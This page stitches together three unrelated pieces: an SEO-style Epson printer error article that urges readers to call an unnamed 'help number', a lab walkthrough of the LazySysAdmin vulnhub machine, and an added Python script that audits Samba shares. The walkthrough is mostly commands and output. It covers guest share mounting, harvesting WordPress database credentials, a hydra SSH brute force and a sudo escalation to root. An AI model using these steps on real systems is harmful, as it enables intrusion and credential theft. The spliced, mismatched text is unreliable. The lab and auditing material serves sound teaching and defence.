#printer not activated error code 41
How to Troubleshoot Epson Printer Not Activated Error Code 41?
Nowadays, people rely on printers for professional tasks. Printers are delicate devices which transform a soft copy into a hard copy. There are lots of printer brands available in the market, among which Epson is considered the leading printer brand due to its distinct features and unparalleled features. Epson printers are highly credible and reliable. However, like other technical devices, they sometimes suffer from various issues, such as Printer Not Activated Error Code 41. Generally, this error happens when the printer is first accessed after the system boots. In this article, you will learn how to troubleshoot Epson printer not activated error code 41. In case of any query or issue, contact Epson Printer Support.

Steps to Fix Epson Printer Not Activated Error Code 41
· Fix System Mistakes: At times, mistakes in the operating system can trigger this issue on your system with “Unactivated printer, error code 41.” This issue indicates that there is a problem either with a printer-related driver on the PC or with the registry files that are related to the printer. If there is a problem in the registry, then you need to check it with registry cleaner software. If the problem is with the operating system, then you have to correct it with system recovery or by resetting the operating system.
· Check the Setup of Printers: Failure to configure printer-related environments may also give rise to this issue. This issue can also occur if the chosen printer is not set as the default printer to execute the printing jobs. If you are getting the message “Unactivated Printer Error 41”, then you should inspect the printer configuration and restart the system's background printer spooler service. This can be done using the Printers and Faxes option in the Start menu, and the service can be restarted using the services.msc instruction under Run.
· Drivers Re-install: Damage or corruption of the printer drivers installed on the system can also be the cause behind the occurrence of this error. If you are experiencing this issue, then you need to use the Device Manager to fully remove the printer drivers mounted on the system and then reinstall the printer drivers.
These are some ways to fix Epson Printer not activated error code 41. However, if you have encountered any problem at any step, then dial the Epson Printer Help Number for a solution.
Source URL http://www.articleted.com/article/155096/25240/How-to-Troubleshoot-Epson-Printer-Not-Activated-Error-Code-41-
Damage or corruption of the printer drivers installed on the system can also lead to
'Epson Printer Not Activated Error Code 41'. Users with this problem should use
Device Manager to completely remove the printer drivers mounted on the system
and then reinstall the printer drivers.
Penetration Test Training – LazySysAdmin: 1 (vanilla style)
and Kai Herings
Good morning everyone…
Today we’re going to start our training session with a fairly decent image from vulnhub.com – LazySysAdmin: 1. To use this image, just download, unzip and throw it against a running VirtualBox. Just be sure to create a host-only network beforehand, so we can find the virtual machine. The system itself will get an IP address via DHCP on this network. We’re using vboxnet4 (192.168.60.0/24) here, so just adapt this to your networking. We are also working on a macOS 10.3, so be sure to adapt the used tools to your environment. We used the following tools:
netdiscover
nmap
dirb
THC hydra
If you want to install these tools with Homebrew, just tap brew tap feffi/homebrew-pentest.
$ brew tap feffi/homebrew-pentest
Everything up? OK, let’s start.
Meanwhile somewhere in outer space…
$ sudo netdiscover -i vboxnet4 -f -r 192.168.60.0/24
Currently scanning: Finished!   |   Our Mac is: DE:AD:BE:EF:DE:AD - 0

1 Captured ARP Req/Rep packets, from 1 hosts.   Total size: 1
_________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor
-----------------------------------------------------------------
192.168.60.2    08:00:27:6d:95:4e      1      60  Unknown vendor

Ah, right, 192.168.60.2, that’s fine. For the sake of reusing this IP in our tasks, we just shorten it a bit:
$ export ip="192.168.60.2"
$ echo $ip
Nice, let’s start a common scanning for services:
$ nmap -sV -sC $ip
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:20 CET
Nmap scan report for 192.168.60.2
Host is up (1.0s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info:
|   server: Admin.local
|   users: 1
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host: 192.168.60.1
|_  error: Closing link: ([email protected]) [Client exited]
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 59m57s, deviation: 0s, median: 59m57s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: , NetBIOS MAC: (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN\x00
|   Domain name: \x00
|   FQDN: lazysysadmin
|_  System time: 2017-11-05T00:22:19+10:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2017-11-04 15:22:19
|_  start_date: 1601-01-01 00:53:28

Ok, that’s a lot of surface to cover. Let’s start with the laziest type of service: Samba. As we can see the account guest is authenticated as user, that is nice. Before we continue, we note down everything that might be a username or password:
$ echo "TR2" >> login.txt
$ echo "guest" >> login.txt
$ echo "LAZYSYSADMIN" >> login.txt
$ echo "lazysysadmin" >> login.txt
$ echo "x00" >> login.txt
Let’s chat…
Having a look at the IRC daemon …
$ telnet 192.168.60.2 6667
Escape character is '^]'
:Admin.local NOTICE Auth :*** Looking up your hostname...
>>PASS none
:Admin.local NOTICE Auth :*** Could not resolve your hostname: Request timed out; using your IP address (192.168.56.1) instead.
>>NICK Bla
>>USER blah blah blah blah
:Admin.local NOTICE Auth :Welcome to Localnet!
:Admin.local 001 Bla :Welcome to the Localnet IRC Network [email protected]
:Admin.local 002 Bla :Your host is Admin.local, running version InspIRCd-2.0
:Admin.local 003 Bla :This server was created 14:52:33 Mar 29 2016
:Admin.local 004 Bla Admin.local InspIRCd-2.0 iosw biklmnopstv bklov
:Admin.local 005 Bla AWAYLEN=201 CASEMAPPING=rfc1459 CHANMODES=b,k,l,imnpst CHANTYPES=# CHARSET=ascii ELIST=MU FNC KICKLEN=256 MAP MAXBANS=60 MAXCHANNELS=20 MAXPARA=32 MAXTARGETS=20 :are supported by this server
:Admin.local 005 Bla MODES=20 NETWORK=Localnet NICKLEN=33 PREFIX=(ov)@+ STATUSMSG=@+ TOPICLEN=308 VBANLIST WALLCHOPS WALLVOICES :are supported by this server
:Admin.local 042 Bla 690AAAAAD :your unique I
:Admin.local 375 Bla :Admin.local message of the day
:Admin.local 372 Bla :- Please edit /etc/inspircd/mot
:Admin.local 376 Bla :End of message of the day.
:Admin.local 251 Bla :There are 1 users and 0 invisible on 1 servers
:Admin.local 254 Bla 0 :channels formed
:Admin.local 255 Bla :I have 1 clients and 0 servers
:Admin.local 265 Bla :Current Local Users: 1  Max: 1
:Admin.local 266 Bla :Current Global Users: 1  Max: 1
Checking for weaknesses on InspIRCd-2.0 … only DoS and spoofing, no remote access known. Let’s walk on to the next.
Samba, Samba, olê…
Now we can enumerate the Samba shares as guest:
$ nmap -sV --script=smb-enum-shares -p445 $ip
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:25 CET
Nmap scan report for 192.168.60.2
Host is up (0.00054s latency).

PORT    STATE SERVICE     VERSION
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: LAZYSYSADMIN

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\192.168.60.2\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (Web server)
|     Users: 1
|     Max Users:
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\192.168.60.2\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users:
|     Path: C:\var\lib\samba\printers
|     Anonymous access:
|     Current user access:
|   \\192.168.60.2\share$:
|     Type: STYPE_DISKTREE
|     Comment: Sumshare
|     Users: 0
|     Max Users:
|     Path: C:\var\www\html\
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE
Oh, nice! A guest writeable directory. Maybe we can snoop around…
$ mkdir share
$ mount_smbfs //guest:@192.168.60.2/share$ share
$ cd share
$ tree -L 2 .
.
├── Backnode_files
│   ├── AAEAAQAAAAAAAAdJAAAAJDhiNGY1YTk3LTQ3NTctNDE1Ny1hZmU4LTlhMWE4.jpg
│   ├── failure-good-thing-fixed.png
│   ├── front-end.css
│   ├── front-end.js
│   ├── jquery-ui.js
│   ├── jquery.js
│   ├── logo.png
│   ├── normalize.css
│   ├── pageable.js
│   ├── picto1.png
│   ├── picto2.png
│   ├── picto3.png
│   ├── script.json
│   ├── styles.css
│   └── tumblr_lb4pi2yt1C1qb2xivo1_500.gif
├── apache
├── deets.txt
├── index.html
├── info.php
├── old
├── robots.txt
├── test
├── todolist.txt
├── wordpress
│   ├── index.php
│   ├── license.txt
│   ├── readme.html
│   ├── wp-activate.php
│   ├── wp-admin
│   ├── wp-blog-header.php
│   ├── wp-comments-post.php
│   ├── wp-config-sample.php
│   ├── wp-config.php
│   ├── wp-content
│   ├── wp-cron.php
│   ├── wp-includes
│   ├── wp-links-opml.php
│   ├── wp-load.php
│   ├── wp-login.php
│   ├── wp-mail.php
│   ├── wp-settings.php
│   ├── wp-signup.php
│   ├── wp-trackback.php
│   └── xmlrpc.php
└── wp
Really? A wordpress installation! Let us check this first.
$ cat wordpress/wp-config.php | grep DB_USER
define('DB_USER', 'Admin');
$ cat wordpress/wp-config.php | grep DB_PASSWORD
define('DB_PASSWORD', 'TogieMYSQL12345^^');
$ cat wordpress/wp-config.php | grep DB_NAME
define('DB_NAME', 'wordpress');
Noted! We got our first username/password combination.
$ echo "deets" >> login.txt
$ echo "Admin" >> login.txt
$ echo "admin" >> login.txt
$ echo "TogieMYSQL12345^^" >> login.txt
$ echo "Togie" >> login.txt
$ echo "togie" >> login.txt
What else do we get here?
$ cat deets.txt
CBF Remembering all these passwords. Remember to remove this file and update your password after we push out the server. Password 12345
$ echo "CBF" >> login.txt
$ echo "12345" >> login.txt
Yeah…sure…we updated it.
$ cat todolist.txt
Prevent users from being able to view to web root using the local file browser
Done. So we got some stuff here, but where to put it?
Land of the Apache
Maybe we should enumerate a little further. We got a website listening on port 80. Spider that:
$ dirb http://$ip
-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Nov 4 14:38:59 2017
URL_BASE: http://192.168.60.2/
WORDLIST_FILES: /usr/local/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.60.2/ ----
==> DIRECTORY: http://ift.tt/2hvafiO
+ http://ift.tt/2jlanBV (CODE:200|SIZE:36072)
+ http://ift.tt/2hw2XeJ (CODE:200|SIZE:77236)
==> DIRECTORY: http://ift.tt/2jlao8X
==> DIRECTORY: http://ift.tt/2hyB3OZ
==> DIRECTORY: http://ift.tt/2jnXDu5
+ http://ift.tt/2htorZo (CODE:200|SIZE:92)
+ http://ift.tt/2jkJEoX (CODE:403|SIZE:292)
==> DIRECTORY: http://ift.tt/2hwIiXI
==> DIRECTORY: http://ift.tt/2jlv7cQ
==> DIRECTORY: http://192.168.60.2/wp/
... (lots of output)
Ok, by the time dirb is running we got some interesting directories to look at:
http://ift.tt/2hvafiO
http://ift.tt/2hw2XeJ
http://ift.tt/2jnXDu5
http://ift.tt/2jlv7cQ
And some more. We’ve already seen those in the Samba enumeration. Let’s try our WordPress then…
$ curl -v http://ift.tt/2jlv7cQ
... My name is togie. My name is togie. My name is togie. My name is togie. ...
mhhh that togie again…mhhh, maybe…we can try ssh…
Serpentine water monster
let us try our already filled login list
$ hydra -t 4 -L login.txt -P login.txt ssh://$ip
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://ift.tt/1cTCuIN) starting at 2017-11-04 20:35:23
[DATA] max 4 tasks per 1 server, overall 4 tasks, 169 login tries (l:13/p:13), ~43 tries per task
[DATA] attacking ssh://192.168.60.2:22/
[STATUS] 128.00 tries/min, 128 tries in 00:01h, 41 to do in 00:01h, 4 active
[22][ssh] host: 192.168.60.2   login: togie   password: 12345
1 of 1 target successfully completed, 1 valid password found
Hydra (http://ift.tt/1cTCuIN) finished at 2017-11-04 20:36:42
Nice! So we login using togie and password 12345
$ ssh togie@$ip
##################################################################################################
# Welcome to Web_TR1 #
# All connections are monitored and recorded #
# Disconnect IMMEDIATELY if you are not an authorized user! #
##################################################################################################
[email protected]'s password: 12345

Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation: http://ift.tt/ABdZxn

  System information as of Sun Nov 5 02:24:33 AEST 2017

  System load: 0.0             Processes: 177
  Usage of /: 48.5% of 2.89GB  Users logged in: 0
  Memory usage: 31%            IP address for eth0: 192.168.60.2
  Swap usage: 0%

  Graph this data and manage this system at:
    http://ift.tt/XlAX5B

133 packages can be updated.
0 updates are security updates.

togie@LazySysAdmin:~$
So we got a shell. Let’s enumerate further.
togie@LazySysAdmin:~$ id
uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
We got sudo…
Flag
$ sudo su -
[sudo] password for togie: 12345
root@LazySysAdmin:~# ls -al
total 28
drwx------  3 root root 4096 Aug 15 23:10 ./
drwxr-xr-x 22 root root 4096 Aug 21 20:10 ../
-rw-------  1 root root 1050 Nov  3 14:45 .bash_history
-rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
drwx------  2 root root 4096 Aug 14 20:30 .cache/
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rw-r--r--  1 root root  347 Aug 21 19:35 proof.txt
Gotcha!
$ cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
Well done :)
Hope you learn't a few things along the way.
Regards,
Togie Mcdogie
Enjoy some random strings
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
 The post Penetration Test Training – LazySysAdmin: 1 (vanilla style) appeared first on codecentric AG Blog.
Penetration Test Training – LazySysAdmin: 1 (vanilla style) published first on http://ift.tt/2fA8nUr
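The whole chain in the walkthrough above starts from one misconfiguration: share$ maps /var/www/html and grants guests READ/WRITE. As an added example (not part of the original post, and not the target's real configuration), this Python script audits an smb.conf for shares a guest session can reach and ranks those that overlap a web root; the sample configuration, the WEB_ROOTS value and the severity labels are assumptions constructed for illustration.

```python
import configparser
import posixpath

# Constructed smb.conf for illustration; the target's real file is not shown in the post.
SAMPLE_SMB_CONF = """
[global]
    workgroup = WORKGROUP

[print$]
    path = /var/lib/samba/printers
    guest ok = no

[share$]
    path = /var/www/html/
    public = yes
    writeable = yes

[uploads]
    path = /srv/uploads
    Guest OK = yes
    read only = no

[docs]
    path = /srv/docs
    guest ok = yes
"""

WEB_ROOTS = ("/var/www",)                # assumption: directories the web server serves
TRUE_WORDS = {"yes", "true", "on", "1"}  # boolean spellings Samba accepts

def parse_smb_conf(text):
    """Parse smb.conf text into {lowercased section: {normalised key: value}}."""
    parser = configparser.RawConfigParser(delimiters=("=",), strict=False)
    # Samba ignores case and spaces in parameter names ("Guest OK" == "guestok").
    parser.optionxform = lambda key: "".join(key.lower().split())
    # Drop indentation so indented lines are not read as value continuations.
    parser.read_string("\n".join(line.strip() for line in text.splitlines()))
    return {name.lower(): dict(parser.items(name)) for name in parser.sections()}

def guest_allowed(params, default=False):
    """'public' is a synonym of 'guest ok'; the Samba default is no."""
    for key in ("guestok", "public"):
        if key in params:
            return params[key].strip().lower() in TRUE_WORDS
    return default

def writable(params, default=False):
    """'writeable', 'writable' and 'write ok' are inverted synonyms of 'read only'."""
    if "readonly" in params:
        return params["readonly"].strip().lower() not in TRUE_WORDS
    for key in ("writeable", "writable", "writeok"):
        if key in params:
            return params[key].strip().lower() in TRUE_WORDS
    return default

def under_web_root(path):
    path = posixpath.normpath(path) if path.startswith("/") else ""
    return any(path == root or path.startswith(root + "/") for root in WEB_ROOTS)

def audit(text):
    """Return one finding per share that a guest session can reach."""
    sections = parse_smb_conf(text)
    glob = sections.pop("global", {})  # share-level settings in [global] act as defaults
    findings = []
    for name, params in sections.items():
        if not guest_allowed(params, guest_allowed(glob)):
            continue
        can_write = writable(params, writable(glob))
        in_web_root = under_web_root(params.get("path", "").strip())
        if can_write and in_web_root:
            severity = "critical"  # guests can change what the web server serves
        elif can_write or in_web_root:
            severity = "high"      # guests can plant files, or read application config
        else:
            severity = "review"    # guest-readable data outside the web root
        findings.append({"share": name, "path": params.get("path", ""),
                         "guest_write": can_write, "severity": severity})
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_SMB_CONF):
        print(finding)
```

On the constructed sample, share$ is rated critical; setting `guest ok = no` on it, or moving the share path out of the web root, clears the finding.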